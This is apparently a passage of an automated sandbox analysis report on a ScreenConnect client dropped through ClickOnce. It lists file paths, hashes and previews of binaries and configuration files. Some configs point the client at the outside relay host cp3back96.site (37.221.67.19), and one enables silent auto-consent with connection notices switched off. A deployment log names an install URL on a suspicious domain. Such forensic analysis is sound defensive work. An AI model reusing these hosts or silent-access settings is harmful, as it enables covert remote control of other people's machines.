                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.B..........." ..0.................. ... ....... .......................`.......0....@.................................5...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................i.......H........................L................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~....%-.&~......\...s....%.....(...+(...+o....o....*....0..s.......~ .....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.....(!....5..............s"....=...*..0...........~....%-.&~......_...s#...%.....(...+..~....%-.&~......`...s%...%.....(...+.r9..

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\4ta5r3hc.newcfg

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):558
                                                                                                                                                                              Entropy (8bit):5.045566990880462
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENORB/vXbAa3xT:2dL9hK6E46YPtvH
                                                                                                                                                                              MD5:320927754A66AA3268EB87125434F3BB
                                                                                                                                                                              SHA1:E1D7F0CB7758B16E19BD5BD73789CD5A2A2DE85D
                                                                                                                                                                              SHA-256:7E159DD775A2FA46A78E8E79ED5E3E375EA07E7D5455695912C51AA086740F93
                                                                                                                                                                              SHA-512:7C468B3A99D568E17FE3FC148D716A6012DBAB8E9CDD24AB05DCE1B146C1C049D7797B50DE11796BDB628119D299F20AB334DE396F80F437CF4257CC15325217
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>cp3back96.site=37.221.67.19-29%2f10%2f2024%2018%3a35%3a22</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.Override.en-US.resources

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):762
                                                                                                                                                                              Entropy (8bit):4.5491067620977805
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:rHy2DLI4MWojmK7iV1ItfU49cAjUPDLS184c7uMUGia84c7eAi5TlO5FMDj0wca2:zHE4yY4M2xjU7w8LS038LD4TlcFq3aIA
                                                                                                                                                                              MD5:B09DFE9FEF5BDAD50AED0C5C81A7F8B8
                                                                                                                                                                              SHA1:0FE2ACB83A8D66156E3F8AFE10963C3878A9C8D4
                                                                                                                                                                              SHA-256:39A6456F828160E9F1D49DF496143A3D83401478B0B9DFD18B66D1F44628AA73
                                                                                                                                                                              SHA-512:C5709D3CB1379ACCCFF12A19CA42B3B696F2266AA94792B011ACD7658EB319C8EF6DF5019F83D8759F1E19DB9D4492582794739C185BD691D7C84493F7390BFB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.../>>..4..2...n_Q2T}........K...Z...5.......z...0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....^E.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.D.e.s.c.r.i.p.t.i.o.n.G...RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.I...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.w.....Support..Support.3Software is Updating..Do not turn off your computer...,Not enough data receiving from host computer..Support

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.Override.resources

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):18414
                                                                                                                                                                              Entropy (8bit):7.8409431994154595
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:r0N78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74K:64Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4BsK
                                                                                                                                                                              MD5:1A9CE086DC257D884E31D884D8C138F1
                                                                                                                                                                              SHA1:83DE5729EB3E524986F18F5144490FD2DE9A8377
                                                                                                                                                                              SHA-256:8D0D89B5CBCBFC3C4EAC7B05EC6A4EB018388E8022D033524B6317BB53C8D56F
                                                                                                                                                                              SHA-512:8CA7783AF9C4C143178587AC0B6928D6D7E37F8B4B2176A34BB4F76415F492286736B2AE8D8E555BB3CEFC103FE816D98FA1296D6BF8DDC094F6AB0D6C85F2D1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF..../._.ks`.k.`.k.M6p-.......'.......w.......P.......\..."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..;..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r..E.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.m#x....X.rYn....R_.ds...*.*......V..x[$]..}.*..b...". ...,...

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.en-US.resources

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):48951
                                                                                                                                                                              Entropy (8bit):4.764447249091755
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:jjhcIEFtl7CWQNzSB3CFLI0pDplrd5UVXWFhj39CwWLVhuK81htvrKetEpGcWITc:jjhcpFt9QNzi3CFLI0Vplrd5UVXWFhjF
                                                                                                                                                                              MD5:3E83A3AA62C5FF54ED98E27B3FBECF90
                                                                                                                                                                              SHA1:96D8927C870A74A478864240B3ACE94AD543DFB8
                                                                                                                                                                              SHA-256:2D88B97D28BE01ABCA4544C6381A4370C1A1CE05142C176742F13B44889DDF90
                                                                                                                                                                              SHA-512:EA9D05A4AA1EE5CCCC61C4F5E8994EFBA9EFFF0549B69577BEF1F2A22CCE908739124EFF1E0DB5CFDD69E077AD2D7CDB1307DE92D79673C9309EE621CB139956
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I..-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..........5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z....V".........

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.resources

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26722
                                                                                                                                                                              Entropy (8bit):7.7401940386372345
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                              MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                              SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                              SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                              SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\app.config

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3379
                                                                                                                                                                              Entropy (8bit):4.771120809482083
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:FOdHgHlHNH8HAH82HyHMHUHZHVHzH52H1HyHkHtHDHH9PtFyA2L:FOZDR
                                                                                                                                                                              MD5:EF1C4DC6088584387A2E0C5E018D766C
                                                                                                                                                                              SHA1:77AB3DD43A336AB8F0478905BA6CE8DE7E829E84
                                                                                                                                                                              SHA-256:C63E1222259013A4F67420BF4DF31D98ECF280201CF4E72C7B591F51CC6625D4
                                                                                                                                                                              SHA-512:33C10BE6A9D440D1E98CF6D0964E87005784F11E8EFC04F15F1DDCD6BF2AFB0A3EECB7B19C690F84EBC6FC62A7766D82FF81AD6B8B71728CAA18B4A2001E6449
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<configuration>.. <configSections>.. <section name="ScreenConnect.SystemSettings" type="System.Configuration.ClientSettingsSection" />.. <section name="ScreenConnect.UserInterfaceSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.SystemSettings>.. <setting name="AutoConsentIfUserProcessNotRunning" serializeAs="String">.. <value>true</value>.. </setting>.. <setting name="AccessAutoConsentIfUserProcessNotRunning" serializeAs="String">.. <value>true</value>.. </setting>.. <setting name="SupportAutoConsentIfUserProcessNotRunning" serializeAs="String">.. <value>true</value>.. </setting>.. <setting name="AutoConsentToBackstage" serializeAs="String">.. <value>true</value>.. </setting>.. </ScreenConnect.SystemSettings>.. <ScreenConnect.UserInterfaceSettings>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="A

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\user.config (copy)

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):558
                                                                                                                                                                              Entropy (8bit):5.045566990880462
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENORB/vXbAa3xT:2dL9hK6E46YPtvH
                                                                                                                                                                              MD5:320927754A66AA3268EB87125434F3BB
                                                                                                                                                                              SHA1:E1D7F0CB7758B16E19BD5BD73789CD5A2A2DE85D
                                                                                                                                                                              SHA-256:7E159DD775A2FA46A78E8E79ED5E3E375EA07E7D5455695912C51AA086740F93
                                                                                                                                                                              SHA-512:7C468B3A99D568E17FE3FC148D716A6012DBAB8E9CDD24AB05DCE1B146C1C049D7797B50DE11796BDB628119D299F20AB334DE396F80F437CF4257CC15325217
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>cp3back96.site=37.221.67.19-29%2f10%2f2024%2018%3a35%3a22</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\web.config

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):735
                                                                                                                                                                              Entropy (8bit):4.453891178092255
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:TMHdmGzVYuBk5CZOSh4ffz1Xn/Ifhg5WCOaOj0CqcNx6goqeUO/+gWV5xT:2doCZZIZApCdRC6w
                                                                                                                                                                              MD5:6642AD60E61C93D20F505969D496BD77
                                                                                                                                                                              SHA1:60913D8C8ABAC793F12ACDFF46D152B6AE38F814
                                                                                                                                                                              SHA-256:84780C2C971E3963E973755E073912B6B1C717CE0B7C02EE33A5B5FB42453626
                                                                                                                                                                              SHA-512:84591058A8D8E4C74947C68FDEB63C10C772C5192B6B6F9E40EC6FAFF4D1E63F88EDDE5D1DD54194650AB545F922FAD97DC9DBEA3A7B8ABEB00D51F3422100F0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>..<configuration>.. <system.webServer>.. <rewrite>.. <rules>.. <rule name="HTTPS redirect" patternSyntax="Wildcard" stopProcessing="true">.. <match url="*" />.. <conditions logicalGrouping="MatchAll">.. <add input="{HTTPS}" pattern="off" />.. <add input="{REQUEST_URI}" pattern="*.well-known/acme-challenge/*" negate="true" />.. </conditions>.. <action type="Redirect" url="https:{HTTP_HOST}{REQUEST_URI}" redirectType="Found" />.. </rule>.. </rules>.. </rewrite>.. </system.webServer>..</configuration>

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\ScreenConnect.ClientService.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61952
                                                                                                                                                                              Entropy (8bit):6.0424578422545006
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:7Sx8zDzYn1DruJCelbgZfBQeV8lsNEbgO:7Sx8z/uNruJv9wQeVXK
                                                                                                                                                                              MD5:22AF3A23BD30484514CDACF67C5B3810
                                                                                                                                                                              SHA1:E92A4EAEE9D896964DE541CE2F01C2404B638258
                                                                                                                                                                              SHA-256:7C5442121DBA2A30AB9579EC08E111DED372CF9CF90FB3256F273980B975AFA9
                                                                                                                                                                              SHA-512:95E40B27E90FCE7CA85E76AFBBC16EB62B4BB977664702B987DE2EB2294E6FE9E6DF5610EC7B2362C2C68493313F30FBBCBD3446DBE8AE2FA47B89407F5D5936
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h............" ..0.............B.... ... ....... .......................`.......l....@.....................................O.... .......................@......D...8............................................ ............... ..H............text...h.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................!.......H........f................................................................(....*^.(.......|...%...}....*:.(......}....*:.(......}....*:.(......}....*.~)...%-.&~(.....f...s....%.)...(...+*vs....%.}M.........s....(....*....0...........s....}.....s....}...........}.......($.....}.....(....&.('..........s....o.....('...~*...%-.&~(.....g...s....%.*...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s;...}....... ..6........s....s;...}.....(%...($............o%........

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\C7EOHWRV.log

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):15014
                                                                                                                                                                              Entropy (8bit):3.814860964944939
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:t6BVn4xtd/8rCoR/BBaOy0ly4xtd/8rCo1bE11B/wox8gkSB4xtd/8rCo6JsaudV:7B4Z/aMB4BE1biB4nWLEv
                                                                                                                                                                              MD5:5D568D58306E8671A0F353F99B7D28DF
                                                                                                                                                                              SHA1:361A5DE406D0F9D88271B83B64DC1215AB70974C
                                                                                                                                                                              SHA-256:82BF21025000B1F89655643517E3E36117241C91C324AC0EEB308D565290BB36
                                                                                                                                                                              SHA-512:D3B636D14303243A1C7D191E71BB618A7A4021174B75A2A675908899241AF4A65E25B182DD94D62A53B10AF72A941AB993EAD2C6311CBFEDC5526DB71E707D79
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.6.5.4...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.B.......c.l.r...d.l.l. .......:. .4...8...4.6.4.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.B.......d.f.d.l.l...d.l.l. .......:. .4...8...4.6.5.4...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.B.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.c.p.9.8.5.6...c.h.e.l.o.k.i.p.o.t.l.e.s.t.e.r...i.c.u./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.c.p.3.b.a.c.k.9.6...s.i.t.e.&.p.=.8.0.4.1.&.s.=.5.9.9.9.b.6.9.7.-.2.f.c.8.-.4.7.

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\NNEWXDXK.2NA\YR49AVEQ.H9P.application

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):144124
                                                                                                                                                                              Entropy (8bit):5.694726688017173
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:F/0/BZSGr3qk54q8sYV7WfUIRTLTyErpErpXm2o9HuzhJOvP:F8BCk5GVW/RWErpErpXmt8vOvP
                                                                                                                                                                              MD5:15C0340778DF443695BEC662F9D21534
                                                                                                                                                                              SHA1:D08FF59760BF40564E38F7256D7172565EF2B4D5
                                                                                                                                                                              SHA-256:7D3A856309950D41FDF338919E115830115F9D56E3A2B9D0EED37E90315D2C80
                                                                                                                                                                              SHA-512:F273BB1BCA5A8F505488405C1F7059DE4E5509B390AF3E7DA465911BCAE7D10884349C6AD09723752490CB329E0ACB63603F69E781F1F348191F1AF6F657F910
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="23.9.10.8817" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):192512
                                                                                                                                                                              Entropy (8bit):6.5759745825926155
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:NfVfH24qg0+UkqVk9kkkkkkHEkkkNikkAkkkkkkkkpkkAkKMi7stGzHqcyzdWFDm:H+a0+UkqVk9kkkkkkHEkkkNikkAkkkku
                                                                                                                                                                              MD5:6BC9611D5B6CEE698149A18D986547A8
                                                                                                                                                                              SHA1:F36AB74E4E502FDAF81E101836B94C91D80CB8EA
                                                                                                                                                                              SHA-256:17377A52EEAE11E8EE01EB629D6A60C10015AD2BB8BC9768E5C8E4B6500A15ED
                                                                                                                                                                              SHA-512:3F23670D0BA150DE19A805DB6BEB6EED8538BBAD6FBE3CC21D17D738A43CF411C679A23CEA11549E69BE0321E672F740791D40E92498AEF9D1F8650743EE85EA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.B..........." ..0.................. ... ....... .......................`.......0....@.................................5...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................i.......H........................L................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~....%-.&~......\...s....%.....(...+(...+o....o....*....0..s.......~ .....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.....(!....5..............s"....=...*..0...........~....%-.&~......_...s#...%.....(...+..~....%-.&~......`...s%...%.....(...+.r9..

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll.genman

                                                                                                                                                                              Download File
